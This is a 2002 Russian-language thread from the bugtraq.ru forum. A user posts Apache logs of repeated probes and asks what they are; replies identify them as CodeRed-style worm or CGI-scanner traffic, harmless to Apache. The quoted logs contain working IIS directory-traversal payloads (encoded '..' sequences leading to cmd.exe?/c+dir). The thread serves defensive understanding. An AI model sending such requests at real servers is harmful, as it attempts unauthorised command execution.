информационная безопасность без паники и всерьез  подробно о проекте
			Анализ криптографических сетевых...   Модель надежности двухузлового...   Специальные марковские модели надежности...   Очередное исследование 19 миллиардов...   Оптимизация ввода-вывода как инструмент...   Зловреды выбирают Lisp и Delphi
	главная обзор RSN блог библиотека закон бред форум dnet о проекте
	bugtraq.ru / форум / hacking		Имя Пароль

	если вы видите этот текст, отключите в настройках форума использование JavaScript

ФОРУМ
	все доски
	FAQ
	IRC
	новые сообщения
	site updates
	guestbook
	beginners
	sysadmin
	programming
	operating systems
	theory
	web building
	software
	hardware
	networking
	law
	hacking
gadgets
job
dnet
humor
miscellaneous
scrap
регистрация

Легенда:   новое сообщение
  закрытая нитка
  новое сообщение
  в закрытой нитке
  старое сообщение

• Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
• Новичкам также крайне полезно ознакомиться с данным документом.

			"моська и слон" басню Крылова читал? Рж :))) 16.04.02 20:56  Число просмотров: 1289 Автор: CETb2 Статус: Незарегистрированный пользователь <"чистая" ссылка>
			Не только трафик.. И настроение тоже... Ведь учимся на опыте, значит и меня ломали :))) [CETb]
			<hacking>

Постоянные интернет-атаки на Web - сервера.. 16.04.02 05:07   Автор: CETb2 Статус: Незарегистрированный пользователь Отредактировано 16.04.02 05:12  Количество правок: 1 <"чистая" ссылка>

Почему-то мой Apache выдает такие попытки к взлому: 24.33.15.53 - - [15/Apr/2002:14:46:44 +0300] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 274 24.33.15.53 - - [15/Apr/2002:14:46:45 +0300] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 272 24.33.15.53 - - [15/Apr/2002:14:46:46 +0300] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 282 24.33.15.53 - - [15/Apr/2002:14:46:47 +0300] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 282 24.33.15.53 - - [15/Apr/2002:14:46:48 +0300] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296 24.33.15.53 - - [15/Apr/2002:14:46:49 +0300] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313 24.33.15.53 - - [15/Apr/2002:14:46:53 +0300] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313 24.33.15.53 - - [15/Apr/2002:14:46:54 +0300] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329 24.33.15.53 - - [15/Apr/2002:14:46:55 +0300] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 24.33.15.53 - - [15/Apr/2002:14:46:56 +0300] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 24.33.15.53 - - [15/Apr/2002:14:46:57 +0300] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 24.33.15.53 - - [15/Apr/2002:14:46:58 +0300] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 24.33.15.53 - - [15/Apr/2002:14:46:59 +0300] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 279 24.33.15.53 - - [15/Apr/2002:14:47:00 +0300] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 279 24.33.15.53 - - [15/Apr/2002:14:47:01 +0300] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296 24.33.15.53 - - [15/Apr/2002:14:47:02 +0300] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296 Первое время я прям бушевал (мой комп взламывают) - отсылал письма провайдерам. А потом забил. Но атаки такого типа не прекратились :(( Причем некоторые из них по времени и по последовательности действий идентичны.. Как напримере - каждую секунду - другая попытка... Может -ли быть это каким-то целенаправленным сканированием сетей какой-то программой , скриптом, или другим мехнаиз-момо ? Кто посоветует, что делать ??, как быть ?? [CETb]

	Да это похоже на сканирование CGI сканнером 14.05.02 23:57   Автор: ih8u <i hate you> Статус: Member <"чистая" ссылка>

	"моська и слон" басню Крылова читал? 16.04.02 11:10   Автор: ZaDNiCa <indeed ZaDNiCa> Статус: Elderman <"чистая" ссылка>

		"моська и слон" басню Крылова читал? 16.04.02 19:56   Автор: Renkvil <Boris> Статус: Member <"чистая" ссылка>
		;-))) Толька моська была одна и не портила слону траффик. ;)

			"моська и слон" басню Крылова читал? Рж :))) 16.04.02 20:56   Автор: CETb2 Статус: Незарегистрированный пользователь <"чистая" ссылка>
			Не только трафик.. И настроение тоже... Ведь учимся на опыте, значит и меня ломали :))) [CETb]

				... и будут пытаться ломать 16.04.02 22:51   Автор: ZaDNiCa <indeed ZaDNiCa> Статус: Elderman <"чистая" ссылка>
				от этого никуда спрячешься... другое дело что если видно что это попытки взлома не червем - надо стучать админам, ответственным за адресное пространство... мож в след раз уже не будут сканить.. а настроение не должно портиться - потому как не получилось сломать...

					Порвал-бы этих тварей - будут знать как на мой комп покушаться!!! 17.04.02 09:28   Автор: CETb2 Статус: Незарегистрированный пользователь <"чистая" ссылка>
					О детях: ====================== Жалко ведь детей.. Кроме 14-16 летних никто так глубо атаковать не будут. Есть много прог определяющие типы софта установленных на OS-е и много другого дерьма, которое с потрохами продаст тебя - выдаст номер аськи, тип OSa, тип Сервера, покажет открытые порты, покажет какими прогами эти порты ломаются.. Даже не в детях дело. Профессионалы (или те, которые считают себя ими) должны разбираться достойно и не идти на такие "стучания".. Хотя, это даже не дети шалили, а так - вирусы.. Но ведь за комп обидно.. ПОРВАЛ-БЫ ЭТИХ ТВАРЕЙ - БУДУТ ЗНАТЬ КАК НА МОЙ КОМП ПОКУШАТЬСЯ!!! ДОСТАЛИ ВИРУСЫ !!! [CETb]

		:))) 16.04.02 17:28   Автор: CETb2 Статус: Незарегистрированный пользователь <"чистая" ссылка>

ничего не делай 16.04.02 06:01   Автор: йцукенг <jcukeng> Статус: Member <"чистая" ссылка>

> 24.33.15.53 - - [15/Apr/2002:14:46:44 +0300] "GET > /scripts/root.exe?/c+dir HTTP/1.0" 404 274 > 24.33.15.53 - - [15/Apr/2002:14:46:45 +0300] "GET > /MSADC/root.exe?/c+dir HTTP/1.0" 404 272 ... > > Может -ли быть это каким-то целенаправленным сканированием > сетей какой-то программой , скриптом, или другим > мехнаиз-момо ? > > Кто посоветует, что делать ??, как быть ?? это CodeRed, скорее всего, долбится с зараженных IIS'ов. можешь забить - апачу это ничем не грозит. впрочем, если с каких-то IP атака идет очень часто, напиши админам этих сеток письма - так и так, есть подозрение, что Ваша сетка заражена червем CodeRed, и праттачь кусок логов с соотв. IP.

		CodeRed запомнится на долго 16.04.02 06:15   Автор: CETb2 Статус: Незарегистрированный пользователь Отредактировано 16.04.02 06:28  Количество правок: 1 <"чистая" ссылка>
		Знакомый вирус.. Когда он меня атаковал у меня IISv4 стоял. После этого я с ужасом смотрю на Microsoft и ее сетевые идеи... Раньше атаки были каждые пол часа. Сейчас немного реже стало.. Печально :((( [CETb]

1

Copyright © 2001-2025 Dmitry Leonov

Page build time: 0 s

Design: Vadim Derkach